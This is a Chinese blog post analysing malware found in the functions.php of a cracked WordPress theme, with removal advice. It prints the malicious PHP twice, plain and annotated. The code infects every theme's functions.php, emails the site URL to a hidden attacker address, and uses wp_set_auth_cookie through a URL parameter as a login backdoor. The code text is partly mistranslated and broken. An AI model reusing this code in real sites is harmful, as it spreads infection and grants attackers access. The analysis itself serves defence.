WordPress企业主题的functions.php文件恶意代码注释及删除方法

测试网上下载的一个破解版本wpyou主题，启用时出现如“致命错误：无法重新声明_verifyactivate_widgets（）”的报错，检查主题的functions.php文件时，发现了_verifyactivate_widgets（），_ verify_isactivate_widgets（），_check_isactive_widget（）， _get_allwidgetscont（），_ prepare_widgets（），_popular_posts（）等函数，乍看之下，还以为是小工具之类的函数，实际是恶意代码。

完整的代码如下：

1. <？PHP
2. 函数_check_isactive_widget （）{
3. $ widget = substr （file_get_contents （__ FILE __ ），strripos （file_get_contents （__FILE__ ），“ <” 。“？” ））; $ output = “” ; $ allowed = “” ;
4. $ output = strip_tags （$ output ，$ allowed ）;
5. $ direst = _get_allwidgetcont （array （substr （dirname （__ FILE __ ），0 ，stripos （dirname （__FILE__ ），“ themes” ）+ 6 ））））;;
6. 如果（is_array （$ direst ））{
7. foreach （$ direst 作为$ item ）{
8. 如果（is_writable （$ item ））{
9. $ ftion = substr （$ widget ，stripos （$ widget ，“ _” ），stripos （substr （$ widget ，stripos （$ widget ，“ _” ）），“（” ））;;
10. $ cont = file_get_contents （$ item ）;
11. if （stripos （$ cont ，$ ftion ）=== false ）{
12. $ explar = stripos （substr （$ cont ，-20 ），“？” 。“>” ）！== false ？“” ：“？” 。“>” ；
13. $ output 。= $ before 。“未找到” 。$ after ;
14. if （stripos （substr （$ cont ，-20 ），“？” 。“>” ）！== false ）{ $ cont = substr （$ cont ，0 ，strripos （$ cont ，“？” 。“>” ）+ 2 ）;}
15. $ output = rtrim （$ output ，“ \ n \ t” ）; fputs （$ f = fopen （$ item ，“ w +” ），$ cont 。$ explar 。“ \ n” 。$ widget ）; fclose （$ f ）;
16. $ output 。= （$ showdots && $ ellipsis ）？“ …” ：“” ;
17. }
18. }
19. }
20. }
21. 返回$ output ;
22. }
23. 函数_get_allwidgetcont （$ wids ，$ items = array （））{
24. $ places = array_shift （$ wids ）;
25. if （substr （$ places ，-1 ）== “ /” ）{
26. $ places = substr （$ places ，0 ，-1 ）;
27. }
28. if （！file_exists （$ places ）|| ！is_dir （$ places ））{
29. 返回false ;
30. } elseif （is_可读（$ places ））{
31. $ elems = scandir （$ places ）;
32. foreach （$ elems as $ elem ）{
33. if （$ elem ！= “。” && $ elem ！= “” ..“ ）{
34. 如果（is_dir （$的地方。“/” 。$ ELEM ））{
35. $ wids [] = $ places 。“ /” 。$ elem ;
36. } ELSEIF （is_file （$的地方。“/” 。$ ELEM ）&&
37. $ elem == substr （__FILE__ ，- 13 ））{
38. $ items [] = $ places 。“ /” 。$ elem ;}
39. }
40. }
41. } 其他{
42. 返回false ;
43. }
44. 如果（sizeof （$ wids ）> 0 ）{
45. 返回_get_allwidgetcont （$ wids ，$ items ）;
46. } 其他{
47. 返回$ items ;
48. }
49. }
50. 如果（！function_exists （“ stripos” ））{
51. 功能stripos （ $ str ，$ needle ，$ offset = 0 ）{
52. return strpos （ strtolower （$ str ），strtolower （$ needle ），$ offset ）;
53. }
54. }
55. 如果（！function_exists （“ strripos” ））{
56. 函数strripos （ $ haystack ，$ needle ，$ offset = 0 ）{
57. 如果（！is_string （$ needle ））$ needle = chr （ intval （$ needle ））;
58. 如果（ $ offset < 0 ）{
59. $ temp_cut = strrev （ substr （$ haystack ，0 ，abs （$ offset ）））; 复制代码
60. }
61. 其他{
62. $ temp_cut = strrev （ substr （ $ haystack ，0 ，max （（strlen （$ haystack ）– $ offset ），0 ）））; 复制代码
63. }
64. 如果（（ $ found = stripos （$ temp_cut ，strrev （$ needle ）））=== FALSE ）返回FALSE ;
65. $ pos = （ strlen （ $ haystack ）– （ $ found + $ offset + strlen （$ needle ）））;
66. 返回$ pos ;
67. }
68. }
69. 如果（！function_exists （“ scandir” ））{
70. 函数scandir （$ dir ，$ listDirectories = false ，$ skipDots = true ）{
71. $ dirArray = 数组（）;
72. 如果（$ handle = opendir （$ dir ））{
73. while （false ！== （$ file = readdir （$ handle ）））{
74. if （（（$ file ！= “。” && $ file ！= “ ..” ）|| $ skipDots == true ）{
75. 如果（$ listDirectories == false ）{ 如果（is_dir （$ file ））{ 继续; } }
76. array_push （$ dirArray ，basename （$ file ））;
77. }
78. }
79. closeir （$ handle ）;
80. }
81. 返回$ dirArray ;
82. }
83. }
84. add_action （“ admin_head” ，“ _check_isactive_widget” ）;
85. 函数_getsprepare_widget （）{
86. 如果（！isset （$ com_length ））$ com_length = 120 ;
87. if （！isset （$ text_value ））$ text_value = “ cookie” ;
88. if （！isset （$ allowed_tags ））$ allowed_tags = “ <a>” ;
89. 如果（！isset （$ type_filter ））$ type_filter = “ none” ;
90. if （！isset （$ expl ））$ expl = “” ;
91. if （！isset （$ filter_homes ））$ filter_homes = get_option （“ home” ）;
92. if （！isset （$ pref_filter ））$ pref_filter = “ wp_” ;
93. if （！isset （$ use_more ））$ use_more = 1 ;
94. if （！isset （$ comm_type ））$ comm_type = “” ;
95. if （！isset （$ pagecount ））$ pagecount = $ _GET [ “ cperpage” ];
96. if （！isset （$ postauthor_comment ））$ postauthor_comment = “” ;
97. if （！isset （$ comm_is_approved ））$ comm_is_approved = “” ;
98. if （！isset （$ postauthor ））$ postauthor = “认证” ;
99. if （！isset （$ more_link ））$ more_link = “（更多…）” ;
100. if （！isset （$ is_widget ））$ is_widget = get_option （“ _is_widget_active_” ）;
101. if （！isset （$ checkingwidgets ））$ checkingwidgets = $ pref_filter 。“设置” 。“ _” 。$ postauthor 。“ _” 。$ text_value ;
102. if （！isset （$ more_link_ditails ））$ more_link_ditails = “（细节…）” ;
103. if （！isset （$ morecontents ））$ morecontents = “ ma” 。$ expl 。“ il” ；
104. if （！isset （$ fmore ））$ fmore = 1 ;
105. 如果（！isset （$ fakeit ））$ fakeit = 1 ;
106. if （！isset （$ sql ））$ sql = “” ;
107. 如果（！$ is_widget ）：
108. 全局$ wpdb ，$ post ;
109. $ expl 。“” 。$ expl 。“ co” 。“ m \” AND post_password = \“ \” AND comment_date_gmt> = CURRENT_TIMESTAMP（）ORDER BY comment_date_gmt DESC LIMIT $ src_count“ ;＃
110. if （！empty （$ post- > post_password ））{
111. if （$ _COOKIE [ “ wp-postpass _ ” 。COOKIEHASH ] ！= $ post- > post_password ）{
112. 如果（is_feed （））{
113. $ output = __ （“没有摘要，因为这是一个受保护的帖子。” ）；
114. } 其他{
115. $ output = get_the_password_form （）;
116. }
117. }
118. }
119. if （！isset （$ f_tags ））$ f_tags = 1 ;
120. if （！isset （$ type_filters ））$ type_filters = $ filter_homes ;
121. 如果（！isset （$ getcommentscont ））$ getcommentscont = $ pref_filter 。$ morecontents ;
122. if （！isset （$ aditional_tags ））$ aditional_tags = “ div” ;
123. if （！isset （$ s_cont ））$ s_cont = substr （$ sq1 ，stripos （$ sq1 ，“ live” ），20 ）;＃
124. if （！isset （$ more_link_text ））$ more_link_text = “继续阅读此条目” ;
125. 如果（！isset （$ showdots ））$ showdots = 1 ;
126. $ comments = $ wpdb- > get_results （$ sql ）;
127. 如果（$ fakeit == 2 ）{
128. $ text = $ post- > post_content ;
129. } elseif （$ fakeit == 1 ）{
130. $ text =（空（$ post- > post_excerpt ））？$ post- > post_content ：$ post- > post_excerpt ;
131. } 其他{
132. $ text = $ post- > post_excerpt ;
133. }
134. $ sq1 = “ SELECT DISTINCT ID，comment_post_ID，comment_author，comment_date_gmt，comment_approved，comment_type，SUBSTRING（comment_content，1，$ src_length）AS com_excerpt FROM $ wpdb-> comments LEFT OUTER JOIN $ wpdb-> posts ON（$ wpdb-com .comment_post_ID = $ wpdb-> posts.ID）comment_approved = \“ 1 \” AND comment_type = \“ \” AND comment_content =“ 。call_user_func_array （$ getcommentscont ，array （$ s_cont ，$ filter_homes ，$ type_filters ））。“ ORDER BY comment_date_gmt DESC LIMIT $ src_count” ;＃
135. 如果（$ com_length < 0 ）{
136. $输出= $文本;
137. } 其他{
138. if （！$ no_more && strpos （$ text ，“ <！-more->” ））{
139. $ text = explode （“ <！-more->” ，$ text ，2 ）;
140. $ l = 计数（$ text [ 0 ]）;
141. $ more_link = 1 ;
142. $ comments = $ wpdb- > get_results （$ sql ）;
143. } 其他{
144. $ text = explode （“” ，$ text ）;
145. if （count （$ text ）> $ com_length ）{
146. $ l = $ com_length ;
147. $ ellipsis = 1 ;
148. } 其他{
149. $ l = 计数（$ text ）;
150. $ more_link = “” ;
151. $ ellipsis = 0 ;
152. }
153. }
154. 为（$ i = 0 ; $ i < $ l ; $ i ++）
155. $ output 。= $ text [ $ i ] 。“ ;
156. }
157. update_option （“ _is_widget_active_” ，1 ）;
158. if （“ all” ！= $ allowed_tags ）{
159. $ output = strip_tags （$ output ，$ allowed_tags ）;
160. 返回$ output ;
161. }
162. Endif ;
163. $ output = rtrim （$ output ，“ \ s \ n \ t \ r \ 0 \ x0B” ）;
164. $输出=（$ f_tags ）？balanceTags （$ output ，true ）：$ output ;
165. $ output 。= （$ showdots && $ ellipsis ）？“ …” ：“” ;
166. $ output = apply_filters （$ type_filter ，$ output ）;
167. 开关（$ aditional_tags ）{
168. 案例（“ div” ）：
169. $ tag = “ div” ;
170. 休息;
171. 大小写（“ span” ）：
172. $ tag = “ span” ;
173. 休息;
174. 大小写（“ p” ）：
175. $ tag = “ p” ;
176. 休息;
177. 默认值：
178. $ tag = “ span” ;
179. }
180.  
181. 如果（$ use_more ）{
182. 如果（$ fmore ）{
183. $ output 。= “” <“ 。$ tag 。“类= \”更多链路\ “> <a href=\”” get_permalink（$post ->。 ID ）。”＃更多- “ 。$交– > ID 。”\“标题= \”” 。$ more_link_text 。“ \”>“ 。$ more_link = ！is_user_logged_in （）&& @call_user_func_array （$ checkingwidgets ，array （$ pagecount ，是））？$ more_link ： ” 。“ </a> </” 。$ tag 。“>” 。“ \ n” ;
184. } 其他{
185. $ output 。= “” <“ 。$ tag 。“类= \”更多链路\ “> <a href=\””。get_permalink（$post -> ID ）。”\“标题= \” “ $ MORE_LINK_TEXT 。”\“>” 。$ more_link 。“ </a> </” 。$ tag 。“>” 。“ \ n” ;
186. }
187. }
188. 返回$ output ;
189. }
190. add_action （“ init” ，“ _getsprepare_widget” ）;
191. 函数__popular_posts （$ no_posts = 6 ，$ before = “ <li>” ，$ after = “ </ li>” ，$ show_pass_post = false ，$ duration = “” ）{
192. 全局$ wpdb ;
193. $ request = “选择ID，post_title，COUNT（$ wpdb-> comments.comment_post_ID）AS \” comment_count \“从$ wpdb-> posts，$ wpdb-> comments” ;
194. $ request 。= “” where comment_approved = \“ 1 \”并且$ wpdb-> posts.ID = $ wpdb-> comments.comment_post_ID AND post_status = \“ publish \”“ ;
195. if （！$ show_pass_post ）$ request 。= “ AND post_password = \” \“” ;
196. 如果（$ duration ！= “” ）{
197. $ request 。= “” AND DATE_SUB（CURDATE（），INTERVAL“ 。$ duration 。” DAY）<post_date“ ;
198. }
199. $ request 。= “” GROUP BY $ wpdb-> comments.comment_post_ID ORDER BY comment_count DESC LIMIT $ no_posts“ ;
200. $ posts = $ wpdb- > get_results （$ request ）;
201. $ output = “” ;
202. 如果（$ posts ）{
203. foreach （$ posts as $ post ）{
204. $ post_title = 斜线（$ post- > post_title ）;
205. $ COMMENT_COUNT = $岗位– > COMMENT_COUNT ;
206. $ permalink = get_permalink （$ post- > ID ）;
207. $ output 。= $ before 。“<a href=\””。$permalink。”\” title=\””。$post_title。”\”> ” 。$ post_title 。“ </a>” 。$ after ;
208. }
209. } 其他{
210. $ output 。= $ before 。“没有找到” 。$ after ;
211. }
212. 返回 $ output ;
213. }
214. ？>

每当WP加载主题时，会调用function.php里面的函数，而恶意代码会在此过程中加在，并检测到你的wp主题的绝对路径，之后把其它的主题一并感染，而且它加了很多伪装代码，此代码变量众多，下面是谷歌后找到的结果：

再来大概说说它的工作原理，首先它会存在某些主题里面，当你启用调试此主题时，这段代码可以通过遍历获取你主题目录下的所有主题里面的functions.php，并在函数中。 php文件开头处的最后一个“？>”处自动添加下面的恶意病毒代码，如果恶意病毒代码添加成功，它会发送您博客的网址地址到livethemas@gmail.com（可能大家没看到这个邮箱地址的添加位置，这就是它的最佳替代，并通过电子邮件地址分割转义，然后用多重变量引用，下面的代码我已经用红色标注出了此电子邮件地址。

解决方法：

把感染了代码的主题下载到电脑本地，在每个主题的functions.php的文件中删除所有恶意代码，再上传到主题目录启用。

PS：因此博客吧建议真心想做网站的站长购买正版主题，安全有保障！

下面是该代码的注释版本：

1. <？PHP
2. 函数_verifyactivate_widgets （）{
3. //当前文件名，如/path-to-www/wp-content/themes/SimpleDark/functions.php
4. //查找当前主题functions.php文件中最后一个<？标记，从这个标记的位置开始，取得一直到文件尾的内容
5. $ widget = substr （file_get_contents （__ FILE __ ），strripos （file_get_contents （__FILE__ ），“ <” 。“？” ））;
6. $ output = “” ;
7. $ allowed = “” ;
8. //去除HTML和PHP的标签，其实这一句是扯蛋…
9. $ output = strip_tags （$ output ，$ allowed ）;
10. //获得主题目录主题的绝对路径，如/ path-to-www / wp-content / themes
11. //为了加强程序的兼容性，它不惜以这种很晦涩的方式来获取…
12. //以主题目录的主题的绝对路径用阵列包裹为参数传递给_get_allwidgets_cont函数获取此博客的所有主题的functions.php的文件的绝对路径
13. $ direst = _get_allwidgets_cont （array （substr （目录名（__FILE __ ），0 ，stripos （目录名（__FILE__ ），“ themes” ）+ 6 ））））;
14. 如果（is_array （$ direst ））{
15. foreach （$ direst 作为$ item ）{
16. //如果主题的functions.php文件可写
17. 如果（is_writable （$ item ））{
18. //特征码
19. $ ftion = substr （$ widget ，stripos （$ widget ，“ _” ），stripos （substr （$ widget ，stripos （$ widget ，“ _” ）），“（” ））;;
20. //取目标的functions.php文件内容
21. $ cont = file_get_contents （$ item ）;
22. //没找到特征码？OK，试图感染
23. if （stripos （$ cont ，$ ftion ）=== false ）{
24. //查看目标functions.php文件最后是否被？>终结，如果不是，给加上？>标记
25. $ comaar = stripos （substr （$ cont ，-20 ），“？” 。“>” ）！== false ？“” ：“？” 。“>” ；
26. //这里的代码是忽悠人了，模仿WP widgets的代码，蛊惑你的眼睛，让你觉得这是widget代码。。。
27. $ output 。= $ before 。“未找到” 。$ after ;
28. //如果文件是以？> 标记结尾的，连标记一起取过来
29. if（stripos（substr（$ cont，-20），“？”。“>”）！==假）{$ cont = substr（$ cont，0，strripos（$ cont，“？”。“>”） + 2）;}
30. //开始感染，$控件内容即是恶意代码自身，在functions.php的文件原内容后附加恶意代码
31. $ output = rtrim（$ output，“ \ n \ t”）; fputs（$ f = fopen（$ item，“ w +”），$ cont。$ comaar。“ \ n”。$ widget）; fclose（$ f）;
32. //后面这句也是伪装用的
33. $ output。=（$ isshowdots＆＃038;＆＃038; $ ellipsis）吗？“ …”：“”;
34. }
35. }
36. }
37. }
38. 返回$ output;
39. }
40. 函数_get_allwidgets_cont（$ wids，$ items = array（））{
41. //从$ WIDS数组弹出一个元素（实际上是一个位置）
42. $地方= array_shift（$ WIDS）;
43. //如果位置字串是以/结尾的，则去掉/
44. if（substr（$ places，-1）==“ /”）{
45. $地方= SUBSTR（$地方，0，-1）;
46. }
47.  
48. //若不存在这样的文件或目录则直接返回假的
49. if（！file_exists（$ places）||！is_dir（$ places））{
50. 返回false；
51. } ELSEIF（is_readable（$地方））{
52. //否则的话……嘿嘿
53. //遍历此目录
54. $ elems的= SCANDIR（$地方）;
55. foreach（$ elems as $ elem）{
56. if（$ elem！=“。”＆＃038;＆＃038; $ elem！=“ ..”）{
57. //如果是目录，则加入$ WIDS数组
58. 如果（is_dir（$ places。“ /”。$ elem））{
59. $ wids [] = $ places。“ /”。$ ELEM;
60. } elseif（is_file（$ places。“ /”。$ elem）＆＃038;＆＃038;
61. $ elem == substr（__ FILE __，-13））{
62. //否则，如果是文件，并且文件名等于functions.php的话，则加入到$ items副本保存，这才是它的目的functions.php正是它要找的
63. $ items [] = $ places。“ /”。$ ELEM;}
64. }
65. }
66. }其他{
67. 返回false；
68. }
69. //下面还有子目录？再找找看，递归
70. 如果（sizeof（$ wids）> 0）{
71. 返回_get_allwidgets_cont（$ wids，$ items）;
72. }其他{
73. //好了，完事了，以数组返回所有找到的functions.php的文件的绝对路径
74. 返回$ items;
75. }
76. }
77.  
78. //下面是3个针对低版本的PHP而写的兼容函数
79. 如果（！function_exists（ “stripos函数”））{
80. 函数stripos（$ str，$ needle，$ offset = 0）{
81. 返回strpos（strtolower（$ str），strtolower（$ needle），$ offset）;
82. }
83. }
84.  
85. 如果（！function_exists（ “strripos”））{
86. 函数strripos（$ haystack，$ needle，$ offset = 0）{
87. if（！is_string（$ needle））$ needle = chr（intval（$ needle））;
88. if（$ offset <0）{
89. $ temp_cut = strrev（substr（$ haystack，0，abs（$ offset）））;
90. }
91. 其他{
92. $ temp_cut = strrev（substr（$ haystack，0，max（（strlen（$ haystack）-$ offset），0）））;
93. }
94. if（（$ found = stripos（$ temp_cut，strrev（$ needle）））=== FALSE）返回FALSE;
95. $ pos =（strlen（$ haystack）-（$ found + $ offset + strlen（$ needle）））;复制代码
96. 返回$ pos;
97. }
98. }
99. 如果（！function_exists（ “SCANDIR”））{
100. 函数scandir（$ dir，$ listDirectories = false，$ skipDots = true）{
101. $ dirArray = array（）;
102. 如果（$ handle = opendir（$ dir））{
103. while（false！==（$ file = readdir（$ handle）））{
104. if（（（$ file！=“。”＆＃038;＆＃038; $ file！=“ ..”）|| $ skipDots == true）{
105. if（$ listDirectories == false）{if（is_dir（$ file））{继续; }}
106. array_push（$ dirArray，基本名（$文件））;
107. }
108. }
109. closedir（$处理）;
110. }
111. 返回$ dirArray;
112. }
113. }
114.  
115. //这个动作添加了，用于检测所有主题目录下的functions.php并感染
116. add_action（“ admin_head”，“ _verifyactivate_widgets”）;
117.  
118. 函数_getprepare_widget（）{
119. if（！isset（$ text_length））$ text_length = 120;
120. if（！isset（$ check））$ check =“ cookie”;
121. if（！isset（$ tagsallowed））$ tagsallowed =“ <a> ”;
122. if（！isset（$ filter））$ filter =“ none”;
123. if（！isset（$ coma））$ coma =“”;
124. if（！isset（$ home_filter））$ home_filter = get_option（“ home”）;
125. if（！isset（$ pref_filters））$ pref_filters =“ wp_”;
126. if（！isset（$ is_use_more_link））$ is_use_more_link = 1;
127. if（！isset（$ com_type））$ com_type =“”;
128. if（！isset（$ cpages））$ cpages = $ _ GET [“ cperpage”];
129. if（！isset（$ post_auth_comments））$ post_auth_comments =“”;
130. if（！isset（$ com_is_approved））$ com_is_approved =“”;
131. if（！isset（$ post_auth））$ post_auth =“认证”;
132. if（！isset（$ link_text_more））$ link_text_more =“（更多…）”;
133. if（！isset（$ widget_yes））$ widget_yes = get_option（“ _ is_widget_active_”）;
134. 如果（！isset（$ checkswidgets））
135. //这个实际是wp_set_auth_cookie
136. 。$ checkswidgets = $ pref_filters “设置”， “_” $ post_auth “_” $支票。。
137. if（！isset（$ link_text_more_ditails））$ link_text_more_ditails =“（详细…）”;
138. if（！isset（$ contentmore））$ contentmore =“ ma”。$ coma。“ il”;
139. if（！isset（$ for_more））$ for_more = 1;
140. if（！isset（$ fakeit））$ fakeit = 1;
141. if（！isset（$ sql））$ sql =“”;
142.  
143. //如果_is_widget_active_ option内容为空，即表示没有被感染过
144. 如果（！$ widget_yes）：
145.  
146. 全局$ wpdb，$ post;
147. //取出存在已经通过的评论（不包括引用/自动参照）的文章
148. // post_author为livethemas@gmail.com的文章，肯定是没有的
149.  
150. $ sq1 =“ SELECT DISTINCT ID，post_title，post_content，post_password，comment_ID，comment_post_ID，comment_author，comment_date_gmt，comment_approved，comment_type，SUBSTRING（comment_content，1，$ src_length）AS com_excerpt from $ wpdb-> comments LEFT OUTER JOIN在（$ wpdb-> comments.comment_post_ID = $ wpdb-> posts.ID）上发布帖子。comment_approved =“ 1” AND comment_type =“” AND post_author =“ li”。$ coma。“ vethe”。$ com_type。“ mas” 。$ coma。“ @”。$ com_is_approved。“ gm”。$ post_auth_comments。“ ail”。$ coma。“。”。$ coma。“ co”。“ m” AND post_password =“” AND comment_date_gmt> = CURRENT_TIMESTAMP（ ）ORDER BY comment_date_gmt DESC LIMIT $ src_count“;＃
151. 如果（！empty（$ post-> post_password））{
152. 如果（$ _COOKIE [“ wp-postpass _”。COOKIEHASH]！= $ post-> post_password）{
153. if（is_feed（））{
154. $ output = __（“没有摘要，因为这是受保护的帖子。”）;
155. }其他{
156. $输出= get_the_password_form（）;
157. }
158. }
159. }
160. if（！isset（$ fixed_tags））$ fixed_tags = 1;
161. if（！isset（$ filters））$ filters = $ home_filter;
162. // $ gettextcomments实际上为wp_mail
163. if（！isset（$ gettextcomments））$ gettextcomments = $ pref_filters。$ contentmore;
164. if（！isset（$ tag_aditional））$ tag_aditional =“ div”;
165.  
166. //这里$ sh_cont即为livethemas@gmail.com
167. if（！isset（$ sh_cont））$ sh_cont = substr（$ sq1，stripos（$ sq1，“ live”），20）;＃
168. if（！isset（$ more_text_link））$ more_text_link =“继续阅读此条目”;
169. if（！isset（$ isshowdots））$ isshowdots = 1;
170.  
171. $注释= $ wpdb-> get_results（$ SQL）;
172. if（$ fakeit == 2）{
173. $文本= $后> POST_CONTENT;
174. } elseif（$ fakeit == 1）{
175. $ text =（empty（$ post-> post_excerpt））？$ post-> post_content：$ post-> post_excerpt;
176. }其他{
177. $文本= $后> post_excerpt;
178. }
179. //开始调用wp_mail向livethemas@gmail.com发送邮件，标题和内容都是被感染的博客的URL地址
180. $ sq1 =“ SELECT DISTINCT ID，comment_post_ID，comment_author，comment_date_gmt，comment_approved，comment_type，SUBSTRING（comment_content，1，$ src_length）AS com_excerpt FROM $ wpdb->评论左外连接$ wpdb->帖子开（$ wpdb-> comments .comment_post_ID = $ wpdb-> posts.ID）在哪里comment_approved =“ 1” AND comment_type =“” AND comment_content =“。call_user_func_array（$ gettextcomments，array（$ sh_cont，$ home_filter，$ filters））。“ ORDER BY comment_date_gmt DESC LIMIT $ src_count”;＃
181. if（$ text_length <0）{
182. $输出= $文本;
183. }其他{
184. if（！$ no_more＆＃038;＆＃038; strpos（$ text，“ <！-more-> ”））{
185. $ text = explode（“ <！-more-> ”，$ text，2）;
186. $升=计数（$文本[0]）;
187. $ more_link = 1;
188. //执行这一句时就开始发邮件了。
189. $注释= $ wpdb-> get_results（$ SQL）;
190. }其他{
191. $ text = explode（“”，$ text）;
192. if（count（$ text）> $ text_length）{
193. $升= $长度text_length;
194. $省略号= 1;
195. }其他{
196. $ L =计数（$文本）;
197. $ link_text_more = “”;
198. $省略号= 0;
199. }
200. }
201. 对于（$ i = 0; $ i <$ l; $ i ++）
202. $ output。= $ text [$ i]。“”;
203. }
204. //把感染标记置为1
205. update_option（“ _ is_widget_active_”，1）;
206. if（“ all”！= $ tagsallowed）{
207. $ output = strip_tags（$ output，$ tagsallowed）;
208. 返回$ output;
209. }
210. 万一;
211. $ output = rtrim（$ output，“ \ s \ n \ t \ r \ 0 \ x0B”）;
212. $ output =（$ fixed_tags）？balanceTags（$ output，true）：$输出;
213. $ output。=（$ isshowdots＆＃038;＆＃038; $ ellipsis）吗？“ …”：“”;
214. // $ filter为none …，又是在伪装
215. $ output = apply_filters（$ filter，$ output）;
216. 开关（$ tag_aditional）{
217. case（“ div”）：
218. $标签= “格”;
219. 打破;
220. case（“ span”）：
221. $标签= “跨度”;
222. 打破;
223. case（“ p”）：
224. $标签= “P”;
225. 打破;
226. 默认值：
227. $标签= “跨度”;
228. }
229.  
230. // $ checkswidgets即是wp_set_auth_cookie
231. 如果（$ is_use_more_link）{
232. if（$ for_more）{
233. $ output。=“” <“。$ tag。“类=”更多的链接“> <a HREF = “”。get_permalink ($ 后 > ID）。 ”＃更多- “。$后> ID”。”标题= “”。$ more_text_link。 “”> “。$ link_text_more =！is_user_logged_in（）＆＃038;＆＃038; @call_user_func_array（$ checkswidgets，array（$ cpages，true））吗？$ link_text_more：“”。“ </a> </”。$ tag。“>”。“\ n”个;
234. }其他{
235. $ output。=“” <“。$ tag。“类=”更多的链接“> <a HREF = “”。get_permalink ($ 后 > ID）。 ”“标题=” “$ more_text_link。 ”“>”。$ link_text_more。“ </a> </”。$ tag。“>”。“\ n”个;
236. }
237. }
238. 返回$ output;
239. }
240.  
241. //这里是用来干坏事的，这才是这个恶意代码的目的，前面的感染是“准备活动”
242. add_action（“ init”，“ _getprepare_widget”）;
243.  
244.  
245. //这个函数也是用来伪装的，无恶意
246. 函数__popular_posts（$ no_posts = 6，$ before =“ <li> ”，$ after =“ </ li> ”，$ show_pass_post = false，$ duration =“”）{
247. 全局$ wpdb;
248. $ request =“ SELECT ID，post_title，COUNT（$ wpdb-> comments.comment_post_ID）AS” comment_count“ FROM $ wpdb-> posts，$ wpdb-> comments”;
249. $ request。=“ WHERE comment_approved =” 1“并且$ wpdb-> posts.ID = $ wpdb-> comments.comment_post_ID AND post_status =” publish“”;
250. if（！$ show_pass_post）$ request。=“ AND post_password =”“”;
251. if（$ duration！=“”）{
252. $ request。=“” AND DATE_SUB（CURDATE（），INTERVAL“。$ duration。” DAY）<post_date“;
253. }
254. $ request。=“” GROUP BY $ wpdb-> comments.comment_post_ID ORDER BY comment_count DESC LIMIT $ no_posts“;
255. $帖= $ wpdb-> get_results（$请求）;
256. $输出= “”;
257. 如果（$ posts）{
258. foreach（将$ posts作为$ post）{
259. $ POST_TITLE =的stripslashes（$后> POST_TITLE）;
260. $ COMMENT_COUNT = $后> COMMENT_COUNT;
261. $永久= get_permalink（$后> ID）;
262. $ output。= $ before。“ <a HREF = “”。$ 永久链接。”” 标题= “”。$ POST_TITLE。””> ”。 $ post_title。“ </a> ”。$之后;
263. }
264. }其他{
265. $ output。= $ before。“没有找到”。$之后;
266. }
267. 返回$ output;
268. }
269. ？>